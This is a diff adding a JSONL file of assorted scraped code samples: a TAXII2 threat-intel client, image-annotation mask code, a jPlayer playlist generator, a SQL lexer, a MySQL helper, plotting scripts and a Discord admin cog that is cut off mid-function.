diff --git "a/3627.jsonl" "b/3627.jsonl" new file mode 100644--- /dev/null +++ "b/3627.jsonl" @@ -0,0 +1,757 @@ +{"seq_id":"512020499","text":"from cytaxii2 import cytaxii2\nimport logging\nfrom linesout import *\nfrom load_config import *\nfrom utils import *\n\nall_collections = [] # All collections in default api root\nall_collection_ids = [] # All collection id in collection in default api root\nall_objects = []\ntype_address = []\n\n#Create and configure logger\nlogging.basicConfig(filename=\"taxiiclient.log\",format='%(asctime)s : %(message)s',filemode='a') \n#Creating an object\nlog=logging.getLogger()\n#Setting the threshold of logger to DEBUG\nlog.setLevel(logging.DEBUG)\n\n\ndef connect_and_discover(url,username,password,version=VERSION):\n # Instantiate server and get API Root\n cytaxii_object = cytaxii2.cytaxii2(discovery_url=url,username=username, password=password, version=version)\n log.info(\"Created Cytaxii Object\")\n discovery_response = cytaxii_object.discovery_request()\n debug_L2_print(\"====== Discovery Response =======\")\n print_object(discovery_response) # will print object if config, PRINT OBJECT is set to True.\n root_discovery_response = cytaxii_object.root_discovery()\n debug_L2_print(\"====== Root Discovery Response =======\")\n print_object(root_discovery_response) # will print object if config, PRINT OBJECT is set to True.\n log.info(\"Root discovered\")\n debug_L2_print(\"========== Connected and Discovered Successfully ==========\")\n log.info(\"Connected and Discovered Successfully\")\n return cytaxii_object\n\n# Getting list of collections form root api\ndef get_collections(cytaxii_object : cytaxii2.cytaxii2):\n collections = cytaxii_object.collection_request()\n log.info(\"Got list of collections from root API. \")\n print_object(collections)\n return collections['response']['collections']\n\n# Get the Collection info by collection id\ndef get_collections_data(cytaxii_object : cytaxii2.cytaxii2,collection_id):\n collection_data = cytaxii_object.collection_data_request(collection_id=collection_id)\n print_object(collection_data)\n return collection_data\n\n# Pull the data from the collection with Collection ID and filters including added_after, limit, object_id\ndef pull_data(cytaxii_object : cytaxii2.cytaxii2,collection_id,added_after=None, limit=None, object_id=None,next=None):\n poll_response = cytaxii_object.poll_request(collection_id=collection_id, added_after=added_after, next=next, limit=limit, object_id=object_id)\n # print_object(poll_response)\n return poll_response\n\n\ndef main():\n log.info(\"Program started running\")\n COLLECTION_IDs = []\n # Get added_after value \n ADDED_AFTER = get_added_after()\n log.info(\"Got ADDED AFTER value : \" + str(ADDED_AFTER))\n\n # Create an object, Connect to Taxii server & Discover \n cytaxii_object = connect_and_discover(url=URL, username=USERNAME, password=PASSWORD)\n \n # This will get all the collections in default api root url.\n all_collections = get_collections(cytaxii_object)\n\n log.info(\"Number of collections got : \" + str(len(all_collections)))\n\n # Get all the Collection ids in an arr\n for collection in all_collections:\n all_collection_ids.append(collection[\"id\"])\n\n # iterate through all the collection_ids to get all the readable objects in an array (all_objects)\n for id in all_collection_ids:\n if get_collections_data(cytaxii_object,collection_id=id)['response']['can_read'] == True:\n polled_data = pull_data(cytaxii_object,collection_id=id,added_after=ADDED_AFTER)\n objects = polled_data[\"response\"]['objects']\n for object in objects:\n all_objects.append(object)\n\n # Check for pagination by puting next vaules in filter \n while polled_data['response']['more']:\n next = int(polled_data['response']['next'])\n polled_data = pull_data(cytaxii_object,collection_id=id,next=next,added_after=ADDED_AFTER)\n all_objects.extend(polled_data['response']['objects'])\n\n # parse all the objects we got and process\n for object in all_objects: \n parse_object(object)\n # store_data(object) # store for backup, feedback, maintainance, experiment, improving, etc\n\n do_filter_csv()\n update_added_after()\n\nmain()","sub_path":"vehere_taxii2_client.py","file_name":"vehere_taxii2_client.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384012222","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/wsiprocess/annotation.py\n# Compiled at: 2019-12-13 21:46:56\n# Size of source mod 2**32: 3546 bytes\nimport cv2, numpy as np\nfrom pathlib import Path\nfrom .annotationparser import ASAP_parser\nfrom annotationparser.parser_utils import detect_type\n\nclass Annotation:\n\n def __init__(self, path):\n self.path = path\n self.read_annotation()\n self.masks = {}\n self.contours = {}\n self.mask_coords = {}\n\n def read_annotation(self, annotation_type=False):\n annotation_type = detect_type(self.path)\n if annotation_type == 'ASAP':\n parser = ASAP_parser()\n parser(self.path)\n else:\n if annotation_type == 'Unknown':\n pass\n self.annotations = parser.annotations\n self.annotation_groups = parser.annotation_groups\n self.classes = parser.classes\n self.mask_coords = parser.mask_coords\n assert len(self.annotations) > 0, 'No annotations found.'\n\n def make_masks(self, slide, inclusion=False, foreground=False, size=2000):\n self.base_masks(slide.wsi_height, slide.wsi_width)\n self.main_masks()\n if inclusion:\n self.exclude_masks(inclusion)\n if foreground:\n self.make_foreground_mask(slide, size)\n\n def base_masks(self, wsi_height, wsi_width):\n for cls in self.classes:\n self.base_mask(cls, wsi_height, wsi_width)\n\n def base_mask(self, cls, wsi_height, wsi_width):\n self.masks[cls] = np.zeros((wsi_height, wsi_width), dtype=(np.uint8))\n self.mask_coords[cls] = []\n\n def main_masks(self):\n for cls in self.classes:\n contours = np.array(self.mask_coords[cls])\n for contour in contours:\n self.masks[cls] = cv2.drawContours((self.masks[cls]), [np.int32(contour)], 0, True, thickness=(cv2.FILLED))\n\n def exclude_masks(self, inclusion):\n self.masks_exclude = self.masks.copy()\n for cls in self.classes:\n if hasattr(inclusion, cls):\n for exclude in getattr(inclusion, cls):\n overlap_area = cv2.bitwise_and(self.masks[cls], self.masks[exclude])\n self.masks_exclude[cls] = cv2.bitwise_xor(self.masks[cls], overlap_area)\n\n self.masks = self.masks_exclude\n\n def make_foreground_mask(self, slide, size=2000):\n if 'foreground' not in self.classes:\n thumb = slide.slide.thumbnail_image(size, height=size)\n thumb = np.ndarray(buffer=(thumb.write_to_memory()), dtype=(np.uint8), shape=[thumb.height, thumb.width, thumb.bands])\n thumb_gray = cv2.cvtColor(thumb, cv2.COLOR_RGB2GRAY)\n _, th = cv2.threshold(thumb_gray, 0, 1, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n self.masks['foreground'] = cv2.resize(th, (slide.width, slide.height))\n self.classes.append('foreground')\n\n def export_thumb_masks(self, save_to='.', size=512):\n for cls in self.masks.keys():\n self.export_thumb_mask(cls, save_to, size)\n\n def export_thumb_mask(self, cls, save_to='.', size=512):\n mask = self.masks[cls]\n height, width = mask.shape\n scale = max(size / height, size / width)\n mask_resized = cv2.resize(mask, dsize=None, fx=scale, fy=scale)\n mask_scaled = mask_resized * 255\n cv2.imwrite(str(Path(save_to) / '{}_thumb.png'.format(cls)), mask_scaled)\n\n def export_masks(self, save_to):\n for cls in self.masks.keys():\n self.export_mask(save_to, cls)\n\n def export_mask(self, save_to, cls):\n cv2.imwrite(str(Path(save_to) / '{}.png'.format(cls)), self.masks[cls], (cv2.IMWRITE_PXM_BINARY, 1))","sub_path":"pycfiles/wsiprocess-0.0.1-py3.7/annotation.cpython-37.py","file_name":"annotation.cpython-37.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334938880","text":"import sys\nimport glob\nimport os\n\n\ninit_path = sys.argv[1]\nrel_path = sys.argv[2]\npattern = sys.argv[3:]\n\ndef _getDirs(base):\n return [x for x in glob.iglob(os.path.join( base, '*')) if os.path.isdir(x) ]\n\ndef rglob(base, pattern):\n list = []\n list.extend(glob.glob(os.path.join(base,pattern)))\n dirs = _getDirs(base)\n if len(dirs):\n for d in dirs:\n list.extend(rglob(os.path.join(base,d), pattern))\n return list\ndef get_audio( init_path, rel_path, pattern ):\n selftuple = ();\n for l in rglob(os.path.join(init_path,rel_path), pattern):\n selftuple= selftuple +tuple([l[len(init_path):]])\n return(selftuple)\n\nap_num = 0;\ndirs = _getDirs(os.path.join(init_path,rel_path))\nf = open('demo.js', 'w')\nif len(dirs):\n for d in dirs:\n folder = os.path.relpath(d,d+\"/..\")\n print(folder)\n ap_num+=1\n toplay = ();\n for patt in pattern:\n toplay += get_audio(init_path,os.path.join(rel_path,folder),patt)\n f.write(\"$(document).ready(function(){\\n \\\n new jPlayerPlaylist({\\n \\\n jPlayer: '#jquery_jplayer_\"+str(ap_num)+\"',\\n \\\n cssSelectorAncestor: '#jp_container_\"+str(ap_num)+\"'\\n \\\n }, [\\n \");\n cont=0;\n for s in toplay:\n cont+=1;\n f.write(\" {\\n \\\n title: '\"+ os.path.splitext(os.path.basename(s))[0] +\"',\\n \\\n artist: '\"+folder+\"',\\n \\\n mp3: '\"+s+\"',\\n \\\n poster: '/\"+os.path.join(rel_path,folder)+\"/cover.jpg'\\n \\\n }\");\n if cont!=len(toplay):\n f.write(\",\\n\");\n\n f.write(\" ], {\\n \\\n swfPath: '../../dist/jplayer',\\n \\\n supplied: 'oga, mp3',\\n \\\n wmode: 'window',\\n \\\n useStateClassSkin: true,\\n \\\n autoBlur: false,\\n \\\n smoothPlayBar: true,\\n \\\n keyEnabled: true\\n \\\n });\\n\\\n });\\n\");\nf.close()","sub_path":"public/media/mp3search.py","file_name":"mp3search.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156538078","text":"#Palabras reservadas para la gramatica\nreservadas = {\n 'select' : 'SELECT',\n 'update' : 'UPDATE',\n 'where' : 'WHERE',\n 'join' : 'JOIN',\n 'create' : 'CREATE',\n 'delete' : 'DELETE',\n 'count' : 'COUNT',\n 'sum' : 'SUM',\n 'from' : 'FROM',\n 'case' : 'CASE',\n 'then' : 'THEN',\n 'else' : 'ELSE',\n 'smallint' : 'SMALLINT',\n 'integer' : 'INTEGER',\n 'bigint' : 'BIGINT',\n 'decimal' : 'DECIMAL',\n 'numeric' : 'NUMERIC',\n 'real' : 'REAL',\n 'money' : 'MONEY',\n 'char' : 'CHAR',\n 'character' : 'CHARACTER',\n 'varying' : 'VARYING',\n 'timestamp' : 'TIMESTAMP',\n 'without' : 'WITHOUT',\n 'with' : 'WITH',\n 'time' : 'TIME',\n 'zone' : 'ZONE',\n 'date' : 'DATE',\n 'interval' : 'INTERVAL',\n 'fields' : 'FIELDS',\n 'year' : 'YEAR',\n 'month' : 'MONTH',\n 'day' : 'DAY',\n 'hour' : 'HOUR',\n 'minute' : 'MINUTE',\n 'second' : 'SECOND',\n 'to' : 'TO',\n 'boolean' : 'BOOLEAN',\n 'as' : 'AS',\n 'enum' : 'ENUM',\n 'type' : 'TYPE',\n 'is' : 'IS',\n 'isnull' : 'ISNULL',\n 'notnull' : 'NOTNULL',\n 'not' : 'NOT',\n 'and' : 'AND',\n 'or' : 'OR',\n 'between' : 'BETWEEN',\n 'like' : 'LIKE',\n 'in' : 'IN',\n 'ilike' : 'ILIKE',\n 'similar' : 'SIMILAR',\n 'replace' : 'REPLACE',\n 'mode' : 'MODE',\n 'owner' : 'OWNER',\n 'if' : 'IF',\n 'exists' : 'EXISTS',\n 'alter' : 'ALTER',\n 'database' : 'DATABASE',\n 'rename' : 'RENAME',\n 'drop' : 'DROP',\n 'table' : 'TABLE',\n 'primary' : 'PRIMARY',\n 'foreign' : 'FOREIGN',\n 'key' : 'KEY',\n 'references' : 'REFERENCES',\n 'constraint' : 'CONSTRAINT',\n 'check' : 'CHECK',\n 'set' : 'SET',\n 'insert' : 'INSERT',\n 'by' : 'BY',\n 'group' : 'GROUP',\n 'having' : 'HAVING',\n 'order' : 'ORDER',\n 'when' : 'WHEN',\n 'union' : 'UNION',\n 'end' : 'END',\n 'values' : 'VALUES',\n 'intersect' : 'INTERSECT',\n 'limit' : 'LIMIT',\n 'inner' : 'INNER',\n 'left' : 'LEFT',\n 'right' : 'RIGHT',\n 'outer' : 'OUTER',\n 'asc' : 'ASC',\n 'desc' : 'DESC',\n 'greatest' : 'GREATEST',\n 'least' : 'LEAST',\n 'offset' : 'OFFSET',\n 'first' : 'FIRST',\n 'last' : 'LAST',\n 'full' : 'FULL',\n 'all' : 'ALL',\n 'true' : 'TRUE',\n 'false' : 'FALSE',\n 'inherits' : 'INHERITS',\n 'null' : 'NULL'\n}\n\n#Lista de tokens\ntokens = [\n 'PUNTO',\n 'ASTERISCO',\n 'PUNTOCOMA',\n 'IGUAL',\n 'PAR_ABRE',\n 'PAR_CIERRA', \n 'CADENA',\n 'ENTERO',\n 'MENOR_IGUAL',\n 'MAS',\n 'MAYOR_IGUAL',\n 'NO_IGUAL',\n 'DIFERENTE',\n 'CORCHE_ABRE',\n 'CORCHE_CIERRA',\n 'CASTEO',\n 'MENOR',\n 'MAYOR',\n 'MENOS',\n 'COMA',\n 'DIVISION',\n 'MODULO',\n 'POTENCIA',\n 'ID'\n] + list(reservadas.values())\n\n#Expresiones regulares\nt_PUNTO = r'\\.'\nt_ASTERISCO = r'\\*'\nt_MAS = r'\\+'\nt_PUNTOCOMA = r';'\nt_IGUAL = r'='\nt_PAR_ABRE = r'\\('\nt_PAR_CIERRA = r'\\)'\nt_MENOR = r'<'\nt_MAYOR = r'>'\nt_COMA = r','\nt_MENOR_IGUAL = r'<='\nt_MAYOR_IGUAL = r'>='\nt_NO_IGUAL = r'!='\nt_DIFERENTE = r'<>'\nt_MENOS = r'-'\nt_DIVISION = r'/'\nt_MODULO = r'%'\nt_CORCHE_ABRE = r'\\['\nt_CORCHE_CIERRA = r'\\]'\nt_POTENCIA = r'\\^'\nt_CASTEO = r'::'\n\ndef t_DECIMAL(t):\n r'\\d+(\\.\\d+)?'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Valor decimal es muy grande %d\", t.value)\n t.value = 0\n return t\n\ndef t_ENTERO(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n except ValueError:\n print(\"Valor entero es muy grande %d\", t.value)\n t.value = 0\n return\n\ndef t_CADENA(t):\n r'(\\\".*?\\\")|(\\'.*?\\')'\n t.value = t.value[1:-1]\n t.value = t.value.replace(\"\\\\\\\"\", \"\\\"\").replace(\"\\\\\\'\", \"\\'\").replace(\"\\\\n\", \"\\n\").replace(\"\\\\t\", \"\\t\")\n return t\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reservadas.get(t.value.lower(),'ID') \n return t\n\n# Comentario de múltiples líneas /* .. */\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\n# Comentario simple // ...\ndef t_COMENTARIO_SIMPLE(t):\n r'--.*\\n'\n t.lexer.lineno += 1\n\nt_ignore = \" \\t\"\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\ndef t_error(t):\n print(\"Caracter incorrecto '%s'\" % t.value[0])\n t.lexer.skip(1)\n\nimport re\nimport ply.lex as lex\nlexer = lex.lex(reflags=re.IGNORECASE)\n\nprecedence = (\n ('left', 'PAR_ABRE', 'PAR_CIERRA')\n)\n#Analizador Sintáctico \n\ndef p_init(t):\n 'init : instrucciones'\n t[0] = t[1]\n\ndef p_instrucciones_lista(t):\n 'instrucciones : instruccion instrucciones'\n t[2].insert(0, t[1])\n t[0] = t[2]\n\ndef p_instrucciones_instruccion(t):\n 'instrucciones : '\n t[0] = []\n\ndef p_instruccion(t):\n '''instruccion : select_instr'''\n\n","sub_path":"parser/team23/grammar/descendente.py","file_name":"descendente.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159629794","text":"# -*- coding: utf-8 -*-\n\nimport easygui\neasygui.msgbox(\"Willkommen im Adressen-zusammenfüg-Prgramm!\")\nname = easygui.enterbox(\"Bitte geben Sie Ihren kompletten Namen ein:\")\nstrasse = easygui.enterbox(\"Und nun den Namen der Strasse, in der Sie leben\")\nhausnummer = easygui.enterbox(\"Ihre Hausnummer, bitte:\")\nPLZ = easygui.enterbox(\"Jetzt die Postleitzahl Ihrer Stadt\")\nstadt = easygui.enterbox(\"Schlussendlich den Namen der Stadt, in der Sie leben\")\n\nadresse = name + \"\\n\" + strasse + \" \" + hausnummer + \"\\n\" + PLZ + \" \" + stadt\neasygui.msgbox(adresse)\n\n","sub_path":"Buch/adressen.py","file_name":"adressen.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197821864","text":"VERBOSE=3\nTITLE=\"simple-flat\"\nWORKFLOW='inversion' # inversion, migration\n#WORKFLOW='test_forward' # inversion, migration\nSOLVER='specfem2d' # specfem2d, specfem3d\n#SYSTEM='serial' # serial, pbs, slurm\n#SYSTEM='multicore' # serial, pbs, slurm\n#SYSTEM='slurm_sm' # serial, pbs, slurm\nSYSTEM='pvc_sm' # serial, pbs, slurm\nOPTIMIZE='LBFGS' # base, newton\n#OPTIMIZE='NLCG' # base, newton\nPREPROCESS='base' # base\nPOSTPROCESS='base' # base\n\nMISFIT='Waveform'\n#MATERIALS='LegacyAcoustic'\nMATERIALS='Acoustic'\n#MATERIALS='Elastic'\nDENSITY='Constant'\n\n\n# WORKFLOW\nBEGIN=1 # first iteration\nEND=200 # last iteration\nNREC=250 # number of receivers\n#NREC=132 # number of receivers\n#NSRC=25 # number of sources\nNSRC=20 # number of sources\nSAVEGRADIENT=1 # save gradient how often\nSAVETRACES=1\n\n\n# PREPROCESSING\nFORMAT='su' # data file format\nREADER='su_specfem2d'\n#acoustic should be z or p\nCHANNELS='p' # data channels\n#try below for elastic\n#CHANNELS='y' # data channels\n#CHANNELS='xz' # data channels\n#NORMALIZE='NormalizeTracesL2' # normalize\nNORMALIZE=0 # normalize\nBANDPASS=0 # bandpass\nFREQLO=0. # low frequency corner\nFREQHI=0. # high frequency corner\nMUTECONST=0.75 # mute constant\nMUTESLOPE=1500. # mute slope\nMUTE='MuteShortOffsets' \nMUTE_SHORT_OFFSETS_DIST=100\n\n\n# POSTPROCESSING\nSMOOTH=10. # smoothing radius\n#SCALE=6.0e6 # scaling factor\nSCALE=1 # scaling factor\n\n\n# OPTIMIZATION\n#PRECOND=None # preconditioner type\n#STEPMAX=10 # maximum trial steps\nSTEPCOUNTMAX=10 # maximum trial steps\nSTEPTHRESH=0.1 # step length safeguard\n\n\n# SOLVER\nNT=5000 # number of time steps\nDT=1.0e-3 # time step\n#NT=48000 # number of time steps\n#DT=0.006 # time step\nF0=5.0 # dominant frequency\n\n\n# SYSTEM\nNTASK=NSRC # must satisfy 1 <= NTASK <= NSRC\n#NTASK=1 # must satisfy 1 <= NTASK <= NSRC\nNPROC=1 # processors per task\n#NPROCMAX=12\nWALLTIME=1500 # walltime\n\n#MPIEXEC='mpirun'\nFLIP_SIGN=\"yes\"\n#SLURMARGS='--ntasks-per-core=1'\nSLURMARGS='--exclusive'\n","sub_path":"examples/simple-flat/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"186952277","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef func(x, a, b, c):\r\n return a * np.exp(-b * x) + c\r\n\r\nsize = 500\r\nnet_type = 'ResNetShallow'\r\npath = './stat/'\r\n\r\nx = np.load(path + str(size) + net_type + 'TrainIter.npy')\r\ny_train = np.load(path + str(size) + net_type + 'TrainErr.npy')\r\ny_test = np.load(path + str(size) + net_type + 'TestErr.npy')\r\nfig = plt.figure()\r\nplt.plot(x, y_train, label='Training Accuracy', alpha=0.5)\r\nplt.plot(x, y_test, label='Testing Accuracy', alpha=0.5)\r\nplt.ylim(0, 1)\r\nplt.xlim(0, max(x))\r\n\r\nz = np.polyfit(x, y_train, 4)\r\np = np.poly1d(z)\r\nplt.plot(x, p(x), 'b', label='Training Fitting')\r\n\r\nprint('Train Final Acc: ' + str(p(max(x))))\r\n\r\nz = np.polyfit(x, y_test, 4)\r\np = np.poly1d(z)\r\nplt.plot(x, p(x), 'r', label='Testing Fitting')\r\nplt.legend()\r\n\r\nprint('Test Final Acc: ' + str(p(max(x))))\r\nfig.savefig('./report/'+str(size)+net_type+'.png')\r\nprint('Save as '+ './report/'+str(size)+net_type+'.png')","sub_path":"poly_fit.py","file_name":"poly_fit.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552179492","text":"from __future__ import absolute_import, annotations\nimport mysql.connector\nfrom mysql.connector import errorcode, Error\nimport pandas as pd\n\n\nclass MySQLManager:\n\n def __init__(self, host: str, port: int, user: str, password: str, database: str) -> None:\n \"\"\"\n Connects python to MySQL, requiring host, port, username, password and database.\n \"\"\"\n self.connection = mysql.connector.connect(\n host=host,\n user=user,\n port=port,\n password=password,\n database=database\n )\n self.connection.autocommit = True\n\n def label_irpef(self, table_name: str):\n \"\"\"\n Creates census brackets following the Irpef (sub)categories.\n :param str table_name: Name of the table whose census data will be modified\n :return: modified table having the attribute \"y\" standardized\n \"\"\"\n cursor = self.connection.cursor(buffered=True)\n try:\n query = \" UPDATE {} SET {} = CASE\" \\\n \" WHEN {} < 15000 THEN '1'\" \\\n \" WHEN {} BETWEEN 15001 AND 22000 THEN '2'\" \\\n \" WHEN {} BETWEEN 22001 AND 28000 THEN '3'\" \\\n \" WHEN {} BETWEEN 28001 AND 35000 THEN '4'\" \\\n \" WHEN {} BETWEEN 35001 AND 42000 THEN '5'\" \\\n \" WHEN {} BETWEEN 42001 AND 49000 THEN '6'\" \\\n \" WHEN {} BETWEEN 49001 AND 55000 THEN '7'\" \\\n \" WHEN {} BETWEEN 55001 AND 75000 THEN '8'\" \\\n \" ELSE '9'\" \\\n \" END\".format(table_name, \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\")\n cursor.execute(query)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Table {} already exists.\".format(table_name))\n else:\n print(err.msg)\n cursor.close()\n\n def execute_read_query(self, table_name: str):\n \"\"\"\n Select operation to recall a table stored in the project_bdt database\n :param str table_name: name of the table that the user wants to recall\n :return: the table is returned as Pandas DataFrame\n \"\"\"\n cursor = self.connection.cursor()\n try:\n query = \"SELECT * FROM {}\".format(table_name)\n cursor.execute(query)\n result = cursor.fetchall()\n return pd.DataFrame(result)\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\n","sub_path":"src/saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620503795","text":"\"\"\"\nThis module implements Symbolic Regression and Division\n\"\"\"\nimport argparse\n\nfrom ast_trees import AST\nfrom utils import graph_generation, create_heatmap\nfrom trees import AddNode, MultNode, SubNode, DivNode\nfrom ga_trees import GeneticAlgorithm\n\n\nclass SymbolicRegression:\n\n def __init__(self, function, min_value=-100, max_value=100, limit_depth=10, with_div=False):\n \"\"\"\n Constructs an instance of the class.\n :param function: function that must be found\n :param min_value: min value of the domain\n :param max_value: max value of the domain\n :param limit_depth: depth from which a tree is punished\n :param with_div: true if division is allowed, otherwise false\n \"\"\"\n # Rango de valores del dominio\n self.function_domain = [x for x in range(min_value, max_value + 1)]\n\n # Valores de la función para el rango [min_value, max_value]\n self.obj_values = [function(x) for x in self.function_domain]\n\n # Terminales permitidos\n self.allowed_terminals = [x for x in range(-10, 11)]\n self.allowed_terminals.extend(['x' for _ in range(20)])\n\n # Funciones permitidas\n self.allowed_functions = [AddNode, SubNode, MultNode]\n self.with_div = with_div\n\n if self.with_div:\n self.allowed_functions.append(DivNode)\n\n # Variables que intervienen en el algoritmo\n self.limit_depth = limit_depth\n\n def calculate_mse(self, tree):\n \"\"\"\n Calculates the mean square error for the given tree.\n :param tree: an instance of the class Node\n :return: mse of the tree if the tree doesn't divide by cero, otherwise None\n \"\"\"\n # Se obtiene el resultado de la ecuación contenida en el árbol para cada uno de los valores del dominio\n tree_values = []\n for x in self.function_domain:\n try:\n tree_values.append(tree.eval(dict_values={'x': x}))\n except ZeroDivisionError:\n return None\n\n # Cálculo el error cuadrático medio\n mse = sum([(x_tree - x_obj) ** 2 for x_tree, x_obj in zip(tree_values, self.obj_values)]) / len(\n self.function_domain)\n\n return mse\n\n def generate_gene(self):\n \"\"\"\n Builds a new tree by using the class AST.\n This tree is used for mutation.\n :return: an AST\n \"\"\"\n return AST(allowed_functions=self.allowed_functions, allowed_terminals=self.allowed_terminals)(max_depth=4)\n\n def generate_individual(self):\n \"\"\"\n Builds a new tree by using the class AST.\n :return: an AST\n \"\"\"\n return AST(allowed_functions=self.allowed_functions, allowed_terminals=self.allowed_terminals)(max_depth=4)\n\n def fitness(self, tree):\n \"\"\"\n Calculates how close a tree is.\n :param tree: an instance of the class Node\n :return: a number that represents how close the tree is\n \"\"\"\n # Cálculo el error cuadrático medio\n mse = self.calculate_mse(tree)\n\n # Se verifica que no se dividió por 0. Si es así, el fitness del árbol tiene el valor 0.\n if mse is None:\n return 0\n\n # Castigo por la profundidad del árbol\n depth = tree.get_depth()\n factor_depth = 1 if depth <= self.limit_depth else 1 / (1 + depth - self.limit_depth)\n\n # Cálculo del fitness\n fitness = (1 / (1 + mse)) * factor_depth if mse > 0 else 1 * factor_depth\n\n return fitness\n\n def condition_finish(self, **kwargs):\n \"\"\"\n Set the condition to finish the algorithm.\n :return: true if the condition is true, otherwise false\n \"\"\"\n best_tree = kwargs['population_dict'][kwargs['best_id']]\n\n # Se calcula el mse del mejor árbol\n mse = self.calculate_mse(best_tree)\n\n # Condición de término\n if mse == 0 or kwargs['max_generation'] == kwargs['generation']:\n print(\"Best Tree: {}\\nMean Cuadratic Error: {}\".format(best_tree, mse))\n\n return True\n\n return False\n\n\nif __name__ == '__main__':\n # Sets the comands\n parser = argparse.ArgumentParser()\n parser.add_argument('--division', help='Ver si se permite la división', required=False, default='false')\n parser.add_argument('--heatmap', required=False, default='false')\n args = parser.parse_args()\n\n # Initialize the problem\n if args.division.lower() == 'true':\n obj = SymbolicRegression(function=lambda x: x + x/2 - 6, with_div=True)\n else:\n obj = SymbolicRegression(function=lambda x: x**2 + x - 6, with_div=False)\n\n # Initialize the genetic algorithm\n genetic_algorithm = GeneticAlgorithm(population_size=35,\n fitness=obj.fitness,\n generate_gene=obj.generate_gene,\n generate_individual=obj.generate_individual,\n mutation_rate=0.1,\n condition_finish=obj.condition_finish,\n max_generation=100)\n\n if obj.with_div:\n print(\"Running Symbolic Regression with Division...\")\n else:\n print(\"Running Symbolic Regression...\")\n\n generations_data = genetic_algorithm.run_algorithm()\n\n graph_generation(generations_scores=generations_data, title='Symbolic Regression')\n\n # Creates the HeatMap\n if args.heatmap.lower() == 'true':\n print('Creating the HeatMap...')\n create_heatmap(obj)\n","sub_path":"tarea3/symbolic_regression.py","file_name":"symbolic_regression.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"406796403","text":"def get_data(aTuple):\n nums=()\n words=()\n for t in aTuple:\n nums=nums+(t[0],)\n if t[1] not in words:\n words =words+(t[1],)\n min_n=min(nums)\n max_n=max(nums)\n unique_words=len(words)\n return (min_n,max_n,unique_words)\n\ntest=((1,\"a\"),(2,\"b\"),(1,\"a\"),(7,\"b\"))\n(a,b,c)=get_data(test)\nprint(\"a:\",a,\"b:\",b,\"c:\",c)\n","sub_path":"17/1702.py","file_name":"1702.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499935761","text":"# Author: YeetMachine#1337 | Modified: Davis#9654\nfrom discord.ext import commands\nimport discord\n\n\nclass Administrator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"add_auth_role\")\n async def add_auth_role(self, ctx, role: commands.RoleConverter):\n \"\"\"Adds role to Auth\"\"\"\n print(role)\n print(type(role))\n if role.id in self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\"):\n await ctx.send(\"Role already added\")\n return\n self.bot.guild_data_update(ctx.guild.id, {\"auth_role\": role.id}, append=True)\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"remove_auth_role\")\n async def remove_auth_role(self, ctx, role: commands.RoleConverter):\n \"\"\"Adds role to Auth\"\"\"\n print(role)\n print(type(role))\n if role.id in self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\"):\n auth_roles = self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\")\n self.bot.guild_data_update(ctx.guild.id, data={\"auth_roles\": auth_roles.remove(role.id)}, append=False)\n await ctx.send(\"Role removed\")\n return\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"print_message\")\n async def print_message(self, ctx, channel: commands.TextChannelConverter):\n messages = [ctx.message, await ctx.send(\"Send Message\")]\n\n def check(m):\n return m.author == ctx.message.author and m.channel.id == ctx.message.channel.id\n\n user_msg = await self.bot.wait_for('message', check=check, timeout=240)\n messages.append(user_msg)\n await channel.send(user_msg.content)\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"edit_message\")\n async def edit_message(self, ctx, message: commands.MessageConverter):\n messages = [ctx.message]\n if message.author.id is not self.bot.user.id:\n return\n print(\"Editing\")\n messages.append(await ctx.send(\"Send Message\"))\n\n def check(m):\n return m.author == ctx.message.author and m.channel.id == ctx.message.channel.id\n\n user_msg = await self.bot.wait_for('message', check=check, timeout=240)\n await message.edit(content=user_msg.content)\n\n for message in messages:\n await message.delete()\n\n\ndef setup(bot):\n 